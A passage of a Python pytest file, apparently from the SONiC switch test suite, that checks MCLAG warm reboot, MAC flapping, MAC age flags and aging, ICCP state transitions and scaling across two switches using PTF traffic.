"switch_info": "/tmp/mclag/mclag_switch_info_{}.txt".format(test_scenario),
"test_scenario": test_scenario,
"learning_flag": False,
"ignore_ports": []
}
}
bg_traffic = threading.Thread(target=continuous_traffic_check, kwargs=params)
bg_traffic.start()
# warm-reboot
# If the standby warm-reboots, then after neighsyncd's warm start state changes to reconciled,
# iccpd will change the interface MAC once the peers reconnect. The interface MAC change makes
# the kernel remove all ARP entries, which causes packet drops, so we enlarge the
# neighsyncd_timer to avoid it.
duthost2.shell("config warm_restart neighsyncd_timer 110")
duthost2.shell("nohup warm-reboot >/dev/null 2>&1 &")
# waiting for ssh to absent then startup
dut_ip = duthost2.host.options['inventory_manager'].get_host(duthost2.hostname).address
res = localhost.wait_for( host=dut_ip,
port=SONIC_SSH_PORT,
state='absent',
search_regex=SONIC_SSH_REGEX,
delay=delay,
timeout=timeout,
module_ignore_errors=True)
if res.is_failed:
raise Exception('DUT did not warm-reboot, maybe orchagent_restart_check failed')
localhost.wait_for( host=dut_ip,
port=SONIC_SSH_PORT,
state='started',
search_regex=SONIC_SSH_REGEX,
delay=delay,
timeout=timeout)
finalizer_state = wait_until(300, 10, check_warm_status, duthost2)
# stop sending traffic
self.ev.clear()
assert finalizer_state, "Warm reboot is expected to finish within 300s"
traffic_res = True
if exc_que.qsize() != 0:
traffic_res = False
_, exc_obj, _ = exc_que.get()
assert traffic_res, "Traffic Test Failed \n {}".format(str(exc_obj))
# basic check after warmreboot
assert duthost2.critical_services_fully_started()
time.sleep(30)
@pytest.mark.parametrize("syncheck", [{'orphan_ports': True}], indirect=True)
def test_syncheck_after_warmreboot(self, syncheck):
# verify mac and arp sync
pass
class TestCase10_MacFlapping():
flapping = {}
@pytest.fixture(scope="function")
def setup_mac_flapping(self, ptfhost):
# move first orphan port's host to standby
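# Simulate a host moving from a dut1 orphan port to a dut2 orphan port: bring the original
# ipvlan interface down, then recreate the namespace/ipvlan behind the flapped PTF port,
# reusing the original server MAC and IP address.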
self.flapping['server1_index'] = len(g_vars['dut1_link_server_interfaces'])/2 - 2
self.flapping['server1_index_flapped'] = len(g_vars['dut1_all_interfaces']) + self.flapping['server1_index']
self.flapping['server1_mac'] = ptfhost.shell("ip netns exec ns%s ip -br link show ivp%s | awk '{print $3}'" % (self.flapping['server1_index']+1, self.flapping['server1_index']+1))['stdout']
self.flapping['server1_ip'] = ptfhost.shell("ip netns exec ns%s ip -br addr show ivp%s | awk '{print $3}'" % (self.flapping['server1_index']+1, self.flapping['server1_index']+1))['stdout']
self.flapping['server1_flapped_mac'] = ptfhost.shell("ip netns exec ns%s ip -br link show ivp%s | awk '{print $3}'" % (self.flapping['server1_index_flapped']+1, self.flapping['server1_index_flapped']+1))['stdout']
self.flapping['server1_flapped_ip'] = ptfhost.shell("ip netns exec ns%s ip -br addr show ivp%s | awk '{print $3}'" % (self.flapping['server1_index_flapped']+1, self.flapping['server1_index_flapped']+1))['stdout']
ptfhost.shell("ip netns exec ns{0} ip link set ivp{0} down".format(self.flapping['server1_index']+1))
ptfhost.shell("ip netns delete ns{}".format(self.flapping['server1_index_flapped']+1))
ptfhost.shell("ip link set dev eth{} address {}".format(self.flapping['server1_index_flapped'], self.flapping['server1_mac']))
ptfhost.shell("ip link add link eth{} name ivp{} type ipvlan mode l2".format(self.flapping['server1_index_flapped'], self.flapping['server1_index_flapped']+1))
ptfhost.shell("ip netns add ns{}".format(self.flapping['server1_index_flapped']+1))
ptfhost.shell("ip link set dev ivp{0} netns ns{0}".format(self.flapping['server1_index_flapped']+1))
ptfhost.shell("ip netns exec ns{0} ip link set ivp{0} up".format(self.flapping['server1_index_flapped']+1))
ptfhost.shell("ip netns exec ns{0} ip address add {1} dev ivp{0}".format(self.flapping['server1_index_flapped']+1, self.flapping['server1_ip']))
yield
ptfhost.shell("ip netns exec ns{0} ip link set ivp{0} up".format(self.flapping['server1_index']+1))
ptfhost.shell("ip netns delete ns{}".format(self.flapping['server1_index_flapped']+1))
ptfhost.shell("ip link set dev eth{} address {}".format(self.flapping['server1_index_flapped'], self.flapping['server1_flapped_mac']))
ptfhost.shell("ip link add link eth{} name ivp{} type ipvlan mode l2".format(self.flapping['server1_index_flapped'], self.flapping['server1_index_flapped']+1))
ptfhost.shell("ip netns add ns{}".format(self.flapping['server1_index_flapped']+1))
ptfhost.shell("ip link set dev ivp{0} netns ns{0}".format(self.flapping['server1_index_flapped']+1))
ptfhost.shell("ip netns exec ns{0} ip link set ivp{0} up".format(self.flapping['server1_index_flapped']+1))
ptfhost.shell("ip netns exec ns{0} ip address add {1} dev ivp{0}".format(self.flapping['server1_index_flapped']+1, self.flapping['server1_flapped_ip']))
def test_traffic_before_mac_flapping(self, duthost, duthost2, ptfhost, testbed):
ptf_runner(
ptfhost,
"ptftests",
"mclag_test.MclagTest",
platform_dir="ptftests",
params={
"router_mac": g_vars['dut1_router_mac'],
"testbed_type": testbed['topo'],
"switch_info": "/tmp/mclag/mclag_switch_info_{}.txt".format(test_scenario),
"test_scenario": test_scenario,
"ignore_ports": []
},
log_file="/tmp/mclag/log/mclag_{}_[{}]_[{}].log".format(test_scenario, self.__class__.__name__, sys._getframe().f_code.co_name)
)
# verify mclag mac age flag
dut1_mac_res = duthost.shell("show mac|awk '{print $3,$4}'")['stdout_lines']
dut2_mac_res = duthost2.shell("show mac|awk '{print $3,$4}'")['stdout_lines']
dut1_macs_on_orphan_ports = []
dut2_macs_on_orphan_ports = []
for line in dut1_mac_res:
if "Ethernet" in line.split()[-1]:
dut1_macs_on_orphan_ports.append(line.split()[0])
for line in dut2_mac_res:
if "Ethernet" in line.split()[-1]:
dut2_macs_on_orphan_ports.append(line.split()[0])
dut1_mclag_mac_res = duthost.shell("mclagdctl -i %s dump mac|grep -v TYPE|awk '{print $3,$7}'" % g_vars['mclag_domain_id'])['stdout_lines']
dut2_mclag_mac_res = duthost2.shell("mclagdctl -i %s dump mac|grep -v TYPE|awk '{print $3,$7}'" % g_vars['mclag_domain_id'])['stdout_lines']
dut1_mclag_mac = {}
dut2_mclag_mac = {}
for line in dut1_mclag_mac_res:
dut1_mclag_mac.update({line.split()[0]: line.split()[-1]})
for line2 in dut2_mclag_mac_res:
dut2_mclag_mac.update({line2.split()[0]: line2.split()[-1]})
for mac in dut1_macs_on_orphan_ports:
assert dut1_mclag_mac[mac] == "P", "Mac learned on a DUT1 orphan port should have the P age flag on the local device"
assert dut2_mclag_mac[mac] == "L", "Mac learned on a DUT1 orphan port should have the L age flag on the peer device"
for mac2 in dut2_macs_on_orphan_ports:
assert dut2_mclag_mac[mac2] == "P", "Mac learned on a DUT2 orphan port should have the P age flag on the local device"
assert dut1_mclag_mac[mac2] == "L", "Mac learned on a DUT2 orphan port should have the L age flag on the peer device"
@pytest.mark.parametrize("syncheck", [{'orphan_ports': True}], indirect=True)
def test_syncheck_before_mac_flapping(self, syncheck):
# verify mac and arp sync
pass
@pytest.mark.usefixtures("setup_mac_flapping")
def test_mac_flapping(self, duthost, duthost2, ptfhost, testbed):
vlan_ip = ipaddress.IPNetwork(duthost2.shell("ip -br addr show dev Vlan1000|awk '{print $3}'")['stdout'])
ptfhost.shell("ip netns exec ns{} ping {} -c 3 -f -W 2".format(self.flapping['server1_index_flapped']+1, vlan_ip.ip))
time.sleep(60)
# check port after flapping
dut1_mac_port = duthost.shell("show mac|grep -i %s|awk '{print $4}'" % self.flapping['server1_mac'])['stdout']
assert dut1_mac_port == g_vars['peer_link_interface'], \
"Flapping mac {} should pointed to peer link interface on active device, from {} flapped to {}".format(self.flapping['server1_mac'], self.flapping['server1_index'], self.flapping['server1_index_flapped'])
dut2_mac_port = duthost2.shell("show mac|grep -i %s|awk '{print $4}'" % self.flapping['server1_mac'])['stdout']
assert "PortChannel" not in dut2_mac_port, "Flapping mac {} should pointed to orphan port on standby device".format(self.flapping['server1_mac'])
# check mclag age flag after flapping
dut1_mac_flag = duthost.shell("mclagdctl -i %s dump mac|grep -i %s|awk '{print $7}'" % (g_vars['mclag_domain_id'], self.flapping['server1_mac']))['stdout']
dut2_mac_flag = duthost2.shell("mclagdctl -i %s dump mac|grep -i %s|awk '{print $7}'" % (g_vars['mclag_domain_id'], self.flapping['server1_mac']))['stdout']
assert dut1_mac_flag == "L", "Mac age flag on the active should be L after the mac flapped to the standby device"
assert dut2_mac_flag == "P", "Mac age flag on the standby should be P after the mac flapped to the standby device"
ptf_runner(
ptfhost,
"ptftests",
"mclag_test.MclagTest",
platform_dir="ptftests",
params={
"router_mac": g_vars['dut1_router_mac'],
"testbed_type": testbed['topo'],
"switch_info": "/tmp/mclag/mclag_switch_info_{}.txt".format(test_scenario),
"test_scenario": test_scenario,
"learning_flag": False,
"ignore_ports": [self.flapping['server1_index']]
},
log_file="/tmp/mclag/log/mclag_{}_[{}]_[{}].log".format(test_scenario, self.__class__.__name__, sys._getframe().f_code.co_name)
)
class TestCase11_MacSyncAndAge():
dut1_orphan_ports_mac = []
dut2_orphan_ports_mac = []
mclag_interface_mac = []
dut1_down_port_server_mac = []
dut2_down_port_server_mac = []
aging_time = 90
@pytest.fixture(scope="class", autouse=True)
def setup_servers(self, ptfhost):
ptf_extra_vars = {
'test_scenario' : test_scenario,
'dut1_all_interfaces' : g_vars['dut1_all_interfaces'],
'dut1_link_server_interfaces': g_vars['dut1_link_server_interfaces'],
'mclag_port_channel_id_list' : g_vars['mclag_port_channel_id_list'],
'mclag_link_vm_interfaces' : g_vars['mclag_link_vm_interfaces'],
'port_server_count' : 1,
'arp_responder_args' : '--conf /tmp/mclag/mclag_arpresponder.conf -e',
'scaling_test' : True
}
ptfhost.host.options['variable_manager'].extra_vars = ptf_extra_vars
ptfhost.template(src="mclag/mclag_switch_info.j2", dest="/tmp/mclag/mclag_switch_info_{}_aging.txt".format(test_scenario))
ptfhost.copy(src="scripts/arp_responder.py", dest="/opt")
ptfhost.template(src="scripts/arp_responder.conf.j2", dest="/etc/supervisor/conf.d/arp_responder.conf")
ptfhost.template(src="mclag/mclag_arpresponder.j2", dest="/tmp/mclag/mclag_arpresponder.conf")
ptfhost.shell("supervisorctl reread")
ptfhost.shell("supervisorctl update")
ptfhost.shell("supervisorctl start arp_responder")
yield
ptfhost.shell("supervisorctl stop arp_responder", module_ignore_errors=True)
@pytest.fixture(scope="function")
def setup_aging_time(self, duthost, duthost2):
res = duthost.shell("redis-cli -n 0 hget SWITCH_TABLE:switch fdb_aging_time")['stdout']
default_aging_time = res if res else 600
dut_extra_vars = {'aging_time': self.aging_time}
duthost.host.options['variable_manager'].extra_vars = dut_extra_vars
duthost2.host.options['variable_manager'].extra_vars = dut_extra_vars
# duthost.template(src="mclag/mclag_fdb_aging.j2", dest="/tmp/mclag_fdb_aging.json")
# duthost.shell("docker cp /tmp/mclag_fdb_aging.json swss:/etc/swss/config.d/mclag_fdb_aging.json")
# duthost.shell("docker exec -i swss swssconfig /etc/swss/config.d/mclag_fdb_aging.json")
duthost2.template(src="mclag/mclag_fdb_aging.j2", dest="/tmp/mclag_fdb_aging.json")
duthost2.shell("docker cp /tmp/mclag_fdb_aging.json swss:/etc/swss/config.d/mclag_fdb_aging.json")
duthost2.shell("docker exec -i swss swssconfig /etc/swss/config.d/mclag_fdb_aging.json")
yield
dut_extra_vars = {'aging_time': default_aging_time}
duthost.host.options['variable_manager'].extra_vars = dut_extra_vars
duthost2.host.options['variable_manager'].extra_vars = dut_extra_vars
# duthost.template(src="mclag/mclag_fdb_aging.j2", dest="/tmp/mclag_fdb_aging.json")
# duthost.shell("docker cp /tmp/mclag_fdb_aging.json swss:/etc/swss/config.d/mclag_fdb_aging.json")
# duthost.shell("docker exec -i swss swssconfig /etc/swss/config.d/mclag_fdb_aging.json")
duthost2.template(src="mclag/mclag_fdb_aging.j2", dest="/tmp/mclag_fdb_aging.json")
duthost2.shell("docker cp /tmp/mclag_fdb_aging.json swss:/etc/swss/config.d/mclag_fdb_aging.json")
duthost2.shell("docker exec -i swss swssconfig /etc/swss/config.d/mclag_fdb_aging.json")
@pytest.fixture(scope="function")
def get_mclag_mac_table(self, duthost, duthost2):
dut1_mclag_mac_dump = duthost.shell("mclagdctl -i %s dump mac|grep -v TYPE|awk '{print $3,$7}'" % g_vars['mclag_domain_id'])['stdout_lines']
dut2_mclag_mac_dump = duthost2.shell("mclagdctl -i %s dump mac|grep -v TYPE|awk '{print $3,$7}'" % g_vars['mclag_domain_id'])['stdout_lines']
dut1_mclag_mac = {}
dut2_mclag_mac = {}
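# In "mclagdctl dump mac" output, rows without an age flag make awk emit only the MAC
# (empty $7), so line.split() yields a single field; map those entries to the sentinel "null".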
for line in dut1_mclag_mac_dump:
mac = line.split()[0]
flag = line.split()[-1] if line.split()[-1] != line.split()[0] else "null"
dut1_mclag_mac[mac] = flag
for line in dut2_mclag_mac_dump:
mac = line.split()[0]
flag = line.split()[-1] if line.split()[-1] != line.split()[0] else "null"
dut2_mclag_mac[mac] = flag
return dut1_mclag_mac, dut2_mclag_mac
@pytest.fixture(scope="function")
def setup_mclag_interface_member(self, duthost, duthost2):
# shutdown active's port joined to first mclag interface and standby's port joined to last
dut1_team_cfg = duthost.shell("teamdctl {} config dump".format(g_vars['mclag_interfaces'][0]))['stdout']
dut2_team_cfg = duthost2.shell("teamdctl {} config dump".format(g_vars['mclag_interfaces'][-1]))['stdout']
dut1_team_port = json.loads(dut1_team_cfg)['ports'].keys()
dut2_team_port = json.loads(dut2_team_cfg)['ports'].keys()
for port1, port2 in zip(dut1_team_port, dut2_team_port):
duthost.shell("config interface shutdown {}".format(port1))
duthost2.shell("config interface shutdown {}".format(port2))
time.sleep(5)
yield
for port1,port2 in zip(dut1_team_port, dut2_team_port):
duthost.shell("config interface startup {}".format(port1))
duthost2.shell("config interface startup {}".format(port2))
time.sleep(5)
def test_traffic_between_servers(self, ptfhost, testbed):
ptf_runner(
ptfhost,
"ptftests",
"mclag_test.MclagTest",
platform_dir="ptftests",
params={
"router_mac": g_vars['dut1_router_mac'],
"testbed_type": testbed['topo'],
"switch_info": "/tmp/mclag/mclag_switch_info_{}_aging.txt".format(test_scenario),
"test_scenario": test_scenario,
"scale": True,
"ignore_ports": []
},
log_file="/tmp/mclag/log/mclag_{}_[{}]_[{}].log".format(test_scenario, self.__class__.__name__, sys._getframe().f_code.co_name)
)
# gather mac info on orphan ports and mclag interfaces from mclag_arpresponder.conf
res = json.loads(ptfhost.shell("cat /tmp/mclag/mclag_arpresponder.conf")['stdout'])
for index in g_vars['dut1_orphan_ports']:
mac_str = res["eth{}".format(index)].values()[0]
mac = ":".join([mac_str[i:i+2].upper() for i in range(0, 12, 2)])
self.dut1_orphan_ports_mac.append(mac)
for index in g_vars['dut2_orphan_ports']:
mac_str = res["eth{}".format(index)].values()[0]
mac = ":".join([mac_str[i:i+2].upper() for i in range(0, 12, 2)])
self.dut2_orphan_ports_mac.append(mac)
for intf in g_vars['mclag_interfaces']:
mac_str = res['eth{}'.format(int(intf.strip("PortChannel"))-1)].values()[0]
mac = ":".join([mac_str[i:i+2].upper() for i in range(0, 12, 2)])
self.mclag_interface_mac.append(mac)
@pytest.mark.usefixtures("setup_mclag_interface_member")
def test_mclag_age_flag_after_mclag_member_port_down(self, ptfhost, get_mclag_mac_table):
res = json.loads(ptfhost.shell("cat /tmp/mclag/mclag_arpresponder.conf")['stdout'])
mac1_str = res["eth{}".format(int(g_vars['mclag_interfaces'][0].strip("PortChannel"))-1)].values()[0]
mac1 = ":".join([mac1_str[i:i+2].upper() for i in range(0, 12, 2)])
self.dut1_down_port_server_mac.append(mac1)
mac2_str = res["eth{}".format(int(g_vars['mclag_interfaces'][-1].strip("PortChannel"))-1)].values()[0]
mac2 = ":".join([mac2_str[i:i+2].upper() for i in range(0, 12, 2)])
self.dut2_down_port_server_mac.append(mac2)
dut1_mclag_mac, dut2_mclag_mac = get_mclag_mac_table
assert dut1_mclag_mac[self.dut1_down_port_server_mac[0]] == "L", "Mac {} should have the L age flag on dut1 after the dut1 mclag {} member port goes down".format(self.dut1_down_port_server_mac[0], g_vars['mclag_interfaces'][0])
assert dut2_mclag_mac[self.dut1_down_port_server_mac[0]] == "P", "Mac {} should have the P age flag on dut2 after the dut1 mclag {} member port goes down".format(self.dut1_down_port_server_mac[0], g_vars['mclag_interfaces'][0])
assert dut2_mclag_mac[self.dut2_down_port_server_mac[0]] == "L", "Mac {} should have the L age flag on dut2 after the dut2 mclag {} member port goes down".format(self.dut2_down_port_server_mac[0], g_vars['mclag_interfaces'][-1])
assert dut1_mclag_mac[self.dut2_down_port_server_mac[0]] == "P", "Mac {} should have the P age flag on dut1 after the dut2 mclag {} member port goes down".format(self.dut2_down_port_server_mac[0], g_vars['mclag_interfaces'][-1])
def test_mclag_age_flag_after_mclag_member_port_up(self, get_mclag_mac_table):
dut1_mclag_mac, dut2_mclag_mac = get_mclag_mac_table
assert dut1_mclag_mac[self.dut1_down_port_server_mac[0]] == "null", "Mac {} on dut1 mclag interfaces should not have any age flag after the dut1 mclag {} member port comes back up".format(self.dut1_down_port_server_mac[0], g_vars['mclag_interfaces'][0])
assert dut2_mclag_mac[self.dut1_down_port_server_mac[0]] == "null", "Mac {} on dut2 mclag interfaces should not have any age flag after the dut1 mclag {} member port comes back up".format(self.dut1_down_port_server_mac[0], g_vars['mclag_interfaces'][0])
assert dut2_mclag_mac[self.dut2_down_port_server_mac[0]] == "null", "Mac {} on dut2 mclag interfaces should not have any age flag after the dut2 mclag {} member port comes back up".format(self.dut2_down_port_server_mac[0], g_vars['mclag_interfaces'][-1])
assert dut1_mclag_mac[self.dut2_down_port_server_mac[0]] == "null", "Mac {} on dut1 mclag interfaces should not have any age flag after the dut2 mclag {} member port comes back up".format(self.dut2_down_port_server_mac[0], g_vars['mclag_interfaces'][-1])
def test_traffic_between_servers_after_mclag_member_port_up(self, ptfhost, testbed):
ptf_runner(
ptfhost,
"ptftests",
"mclag_test.MclagTest",
platform_dir="ptftests",
params={
"router_mac": g_vars['dut1_router_mac'],
"testbed_type": testbed['topo'],
"switch_info": "/tmp/mclag/mclag_switch_info_{}_aging.txt".format(test_scenario),
"test_scenario": test_scenario,
"learning_flag": False,
"scale": True,
"ignore_ports": []
},
log_file="/tmp/mclag/log/mclag_{}_[{}]_[{}].log".format(test_scenario, self.__class__.__name__, sys._getframe().f_code.co_name)
)
def test_mclag_age_flag_after_traffic_between_servers(self, get_mclag_mac_table):
dut1_mclag_mac, dut2_mclag_mac = get_mclag_mac_table
# check server macs attach to dut1 orphan ports
for mac in self.dut1_orphan_ports_mac:
assert dut1_mclag_mac[mac] == "P", "Mac {} on dut1 orphan port should add P age flag on dut1".format(mac)
assert dut2_mclag_mac[mac] == "L", "Mac {} on dut1 orphan port should add L age flag on dut2".format(mac)
# check server macs attach to dut2 orphan ports
for mac in self.dut2_orphan_ports_mac:
assert dut2_mclag_mac[mac] == "P", "Mac {} on dut2 orphan port should add P age flag on dut2".format(mac)
assert dut1_mclag_mac[mac] == "L", "Mac {} on dut2 orphan port should add L age flag on dut1".format(mac)
# check server macs attach to mclag interfaces
for mac in self.mclag_interface_mac:
assert dut1_mclag_mac[mac] == "null", "Mac {} on dut1 mclag interfaces should not add any age flag".format(mac)
assert dut2_mclag_mac[mac] == "null", "Mac {} on dut2 mclag interfaces should not add any age flag".format(mac)
def test_mclag_age_flag_before_age(self, duthost, duthost2, ptfhost, get_mclag_mac_table):
dut1_mclag_mac, dut2_mclag_mac = get_mclag_mac_table
# check server macs attach to dut1 orphan ports
for mac in self.dut1_orphan_ports_mac:
assert dut1_mclag_mac[mac] == "P", "Mac {} on dut1 orphan port should add P age flag on dut1".format(mac)
assert dut2_mclag_mac[mac] == "L", "Mac {} on dut1 orphan port should add L age flag on dut2".format(mac)
# check server macs attach to dut2 orphan ports
for mac in self.dut2_orphan_ports_mac:
assert dut2_mclag_mac[mac] == "P", "Mac {} on dut2 orphan port should add P age flag on dut2".format(mac)
assert dut1_mclag_mac[mac] == "L", "Mac {} on dut2 orphan port should add L age flag on dut1".format(mac)
# check server macs attach to mclag interfaces
for mac in self.mclag_interface_mac:
assert dut1_mclag_mac[mac] == "null", "Mac {} on dut1 mclag interfaces should not add any age flag".format(mac)
assert dut2_mclag_mac[mac] == "null", "Mac {} on dut2 mclag interfaces should not add any age flag".format(mac)
def test_mac_aging_on_peer(self, duthost2, ptfhost, testbed, setup_aging_time):
ptfhost.shell("supervisorctl stop arp_responder")
i = 1
interval = 60
while(i <= self.aging_time*2/interval):
# only send traffic to dut1 ports
ptf_runner(
ptfhost,
"ptftests",
"mclag_test.MclagTest",
platform_dir="ptftests",
params={
"router_mac": g_vars['dut1_router_mac'],
"testbed_type": testbed['topo'],
"switch_info": "/tmp/mclag/mclag_switch_info_{}_aging.txt".format(test_scenario),
"test_scenario": test_scenario,
"learning_flag": False,
"scale": True,
"ignore_ports": g_vars['dut2_link_server_interfaces']
},
log_file="/tmp/mclag/log/mclag_{}_[{}]_[{}].log".format(test_scenario, self.__class__.__name__, sys._getframe().f_code.co_name)
)
time.sleep(interval)
i += 1
dut2_mac = duthost2.shell("show mac|grep Dynamic|awk '{print $3}'")['stdout_lines']
res = set(self.dut2_orphan_ports_mac) & set(dut2_mac)
assert not res, "Macs on dut2 should have aged out after setting the aging time to {}s and waiting {}s".format(self.aging_time, self.aging_time*2)
time.sleep(60) # wait for mclag mac sync
def test_mclag_age_flag_after_aging(self, get_mclag_mac_table):
dut1_mclag_mac, dut2_mclag_mac = get_mclag_mac_table
# check server macs attach to dut1 orphan ports
for mac in self.dut1_orphan_ports_mac:
assert dut1_mclag_mac[mac] == "P", "Mac {} on dut1 orphan port should add P age flag on dut1 after dut2 mac age".format(mac)
assert dut2_mclag_mac[mac] == "L", "Mac {} on dut1 orphan port should add L age flag on dut2 after dut2 mac age".format(mac)
# check server macs attach to dut2 orphan ports
for mac in self.dut2_orphan_ports_mac:
assert mac not in dut2_mclag_mac, "Mac {} on dut2 orphan port should be deleted on dut2 after dut2 mac age".format(mac)
assert mac not in dut1_mclag_mac, "Mac {} on dut2 orphan port should be deleted on dut1 after dut2 mac age".format(mac)
# check server macs attach to mclag interfaces
for mac in self.mclag_interface_mac:
assert dut1_mclag_mac[mac] == "P", "Mac {} on dut1 mclag interfaces should add P age flag after dut2 mac age".format(mac)
assert dut2_mclag_mac[mac] == "L", "Mac {} on dut2 mclag interfaces should add L age flag after dut2 mac age".format(mac)
def test_relearn_after_mac_age(self, ptfhost, testbed):
ptfhost.shell("supervisorctl start arp_responder")
ptf_runner(
ptfhost,
"ptftests",
"mclag_test.MclagTest",
platform_dir="ptftests",
params={
"router_mac": g_vars['dut1_router_mac'],
"testbed_type": testbed['topo'],
"switch_info": "/tmp/mclag/mclag_switch_info_{}_aging.txt".format(test_scenario),
"test_scenario": test_scenario,
"scale": True,
"ignore_ports": []
},
log_file="/tmp/mclag/log/mclag_{}_[{}]_[{}].log".format(test_scenario, self.__class__.__name__, sys._getframe().f_code.co_name)
)
def test_mclag_age_flag_after_relearn(self, get_mclag_mac_table):
dut1_mclag_mac, dut2_mclag_mac = get_mclag_mac_table
# check server macs attach to dut1 orphan ports
for mac in self.dut1_orphan_ports_mac:
assert dut1_mclag_mac[mac] == "P", "Mac {} on dut1 orphan port should add P age flag on dut1".format(mac)
assert dut2_mclag_mac[mac] == "L", "Mac {} on dut1 orphan port should add L age flag on dut2".format(mac)
# check server macs attach to dut2 orphan ports
for mac in self.dut2_orphan_ports_mac:
assert dut2_mclag_mac[mac] == "P", "Mac {} on dut2 orphan port should add P age flag on dut2".format(mac)
assert dut1_mclag_mac[mac] == "L", "Mac {} on dut2 orphan port should add L age flag on dut1".format(mac)
# check server macs attach to mclag interfaces
for mac in self.mclag_interface_mac:
assert dut1_mclag_mac[mac] == "P", "Mac {} age flag on dut1 mclag interfaces should not change after dut2 relearns".format(mac)
assert dut2_mclag_mac[mac] == "L", "Mac {} age flag on dut2 mclag interfaces should not change after dut2 relearns".format(mac)
class TestCase12_ICCP_CSM():
@pytest.fixture(scope="function", autouse=True)
def setup_logrotate_cron_task(self, duthost, duthost2):
# Disable logrotate cron task
duthost.shell("sed -i 's/^/#/g' /etc/cron.d/logrotate")
duthost2.shell("sed -i 's/^/#/g' /etc/cron.d/logrotate")
# Wait for logrotate from previous cron task run to finish
i = 1
while(i<=6):
res1 = duthost.shell("! pgrep -f logrotate", module_ignore_errors=True)['rc']
res2 = duthost2.shell("! pgrep -f logrotate", module_ignore_errors=True)['rc']
if res1 == 0 and res2 == 0:
break
else:
i += 1
time.sleep(5)
duthost.shell("logrotate -f /etc/logrotate.conf")
duthost2.shell("logrotate -f /etc/logrotate.conf")
yield
duthost.shell("sed -i 's/^#//g' /etc/cron.d/logrotate")
duthost2.shell("sed -i 's/^#//g' /etc/cron.d/logrotate")
def test_active_restart(self, duthost, localhost):
# reboot dut and wait for recovered
reboot(duthost, localhost, wait=180)
status = duthost.shell("mclagdctl -i {} dump state|grep keepalive".format(g_vars['mclag_domain_id']))['stdout'].split(":")[-1].strip()
assert status == "OK", "MCLAG keepalive status should be OK on dut1"
iccp_csm_log = duthost.shell("cat /var/log/syslog|grep iccp_csm_transit")['stdout']
match_msg_regex = re.compile("^.*?from NONEXISTENT to INITIALIZED.\n(.*?\n)??.*?from .*? to CAPREC.\n(.*?\n)??.*?from .*? to OPERATIONAL")
assert match_msg_regex.search(iccp_csm_log) != None
def test_standby_restart(self, duthost2, localhost):
# reboot dut and wait for recovered
reboot(duthost2, localhost, wait=180)
status = duthost2.shell("mclagdctl -i {} dump state|grep keepalive".format(g_vars['mclag_domain_id']))['stdout'].split(":")[-1].strip()
assert status == "OK", "MCLAG keepalive status should be OK on dut2"
iccp_csm_log = duthost2.shell("cat /var/log/syslog|grep iccp_csm_transit")['stdout']
match_msg_regex = re.compile("^.*?from NONEXISTENT to INITIALIZED.\n(.*?\n)??.*?from .*? to CAPREC.\n(.*?\n)??.*?from .*? to OPERATIONAL")
assert match_msg_regex.search(iccp_csm_log) != None
class TestCase13_Scaling():
# max num <= 252
port_server_count = 100
@pytest.fixture(scope="class", autouse=True)
def setup_servers(self, duthost, duthost2, ptfhost):
duthost.shell("sysctl -w net.ipv4.neigh.default.gc_thresh1=10000")
duthost.shell("sysctl -w net.ipv4.neigh.default.gc_thresh2=10000")
duthost.shell("sysctl -w net.ipv4.neigh.default.gc_thresh3=10000")
duthost2.shell("sysctl -w net.ipv4.neigh.default.gc_thresh1=10000")
duthost2.shell("sysctl -w net.ipv4.neigh.default.gc_thresh2=10000")
duthost2.shell("sysctl -w net.ipv4.neigh.default.gc_thresh3=10000")
ptf_extra_vars = {
'test_scenario' : test_scenario,
'dut1_all_interfaces' : g_vars['dut1_all_interfaces'],
'dut1_link_server_interfaces': g_vars['dut1_link_server_interfaces'],
'mclag_port_channel_id_list' : g_vars['mclag_port_channel_id_list'],
'mclag_link_vm_interfaces' : g_vars['mclag_link_vm_interfaces'],
'port_server_count' : self.port_server_count,
'arp_responder_args' : '--conf /tmp/mclag/mclag_arpresponder.conf -e',
'scaling_test' : True
}
ptfhost.host.options['variable_manager'].extra_vars = ptf_extra_vars
ptfhost.template(src="mclag/mclag_switch_info.j2", dest="/tmp/mclag/mclag_switch_info_{}_scaling.txt".format(test_scenario))
ptfhost.copy(src="scripts/arp_responder.py", dest="/opt")
ptfhost.template(src="scripts/arp_responder.conf.j2", dest="/etc/supervisor/conf.d/arp_responder.conf")
ptfhost.template(src="mclag/mclag_arpresponder.j2", dest="/tmp/mclag/mclag_arpresponder.conf")
ptfhost.shell("supervisorctl reread")
ptfhost.shell("supervisorctl update")
ptfhost.shell("supervisorctl start arp_responder")
yield
ptfhost.shell("supervisorctl stop arp_responder")
# clear neighbors used for test
vlans = json.loads(duthost.shell("sonic-cfggen -d --var-json VLAN")['stdout']).keys()
for vlan in vlans:
duthost.shell("ip link set arp off dev {0}; ip link set arp on dev {0}".format(vlan))
duthost2.shell("ip link set arp off dev {0}; ip link set arp on dev {0}".format(vlan))
def test_traffic_between_servers(self, ptfhost, testbed):
ptf_runner(
ptfhost,
"ptftests",
"mclag_test.MclagTest",
platform_dir="ptftests",
params={
"router_mac": g_vars['dut1_router_mac'],
"testbed_type": testbed['topo'],
"switch_info": "/tmp/mclag/mclag_switch_info_{}_scaling.txt".format(test_scenario),
"test_scenario": test_scenario,
"scale": True,
"ignore_ports": []
},
log_file="/tmp/mclag/log/mclag_{}_[{}]_[{}].log".format(test_scenario, self.__class__.__name__, sys._getframe().f_code.co_name)
)
def test_mac_arp_sync(self, duthost, duthost2, ptfhost):
random_check_num = self.port_server_count
res = json.loads(ptfhost.shell("cat /tmp/mclag/mclag_arpresponder.conf")['stdout'])
dut1_ports = natsorted(g_vars['dut1_port_alias']['port_name_map'].keys())
dut2_ports = natsorted(g_vars['dut2_port_alias']['port_name_map'].keys())
dut1_orphan_ports = dut1_ports[len(g_vars['dut1_link_server_interfaces'])/2-2:len(g_vars['dut1_link_server_interfaces'])/2] + \
dut1_ports[len(g_vars['dut1_link_server_interfaces'])-2:len(g_vars['dut1_link_server_interfaces'])]
dut2_orphan_ports = dut2_ports[len(g_vars['dut2_link_server_interfaces'])/2-2:len(g_vars['dut2_link_server_interfaces'])/2] + \
dut2_ports[len(g_vars['dut2_link_server_interfaces'])-2:len(g_vars['dut2_link_server_interfaces'])]
for t in ["mac", "arp"]:
if t == "mac":
dut1_entry_res = duthost.shell("show mac")['stdout_lines']
dut2_entry_res = duthost2.shell("show mac")['stdout_lines']
else:
dut1_entry_res = duthost.shell("show arp")['stdout_lines']
dut2_entry_res = duthost2.shell("show arp")['stdout_lines']
assert dut1_entry_res, "Can not get DUT1 {} entry".format(t)
assert dut2_entry_res, "Can not get DUT2 {} entry".format(t)
